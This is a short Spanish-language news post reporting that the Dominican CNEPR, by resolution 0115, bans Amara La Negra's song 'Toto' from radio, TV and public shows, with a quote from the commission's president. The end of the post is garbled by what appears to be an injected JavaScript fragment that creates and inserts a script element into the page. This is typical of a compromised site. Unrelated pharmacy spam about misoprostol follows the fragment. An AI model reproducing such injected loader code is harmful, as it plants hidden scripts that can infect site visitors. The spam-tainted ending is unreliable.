Home / Publicaciones / Rincon Urbano / El CNEPR Veda La Canción Toto de Amara La Negra

El CNEPR Veda La Canción Toto de Amara La Negra

Mediante la resolución 0115 la (CNEPR) – Comisión Nacional de Espectáculos Públicos y Radiofonía prohíbe< !more> la propagación a través de la radio y TV asi como también la presentación en público del tema Toto de Amara La Negra, en la lista también incluyeron otros temas del artista de NFasis.

La prohibición 0115 es la primera que se pronuncia este año, a solo siete días de haber iniciado y es de forma obligatoria su ejecución en todas las emisoras de radio, canales de TV y para sedes de espectáculos públicos.

Amara La Negra  Toto

“Está bajo la obligación legal, social y moral de los Directores, Productores y propietarios de medios y locales de esparcimiento el cumplimiento de esta orden en beneficio de una juventud más sana y de una sociedad que relieve los valores honestos y las buenas prácticas”, dijo  J. M. Hidalgo Presidente del CNEPR.

https://soundcloud.com/zonaurbanaent/amaralanegraftelchevototoofficialcocoremixvar d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript); misoprostol in south african pharmacies

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...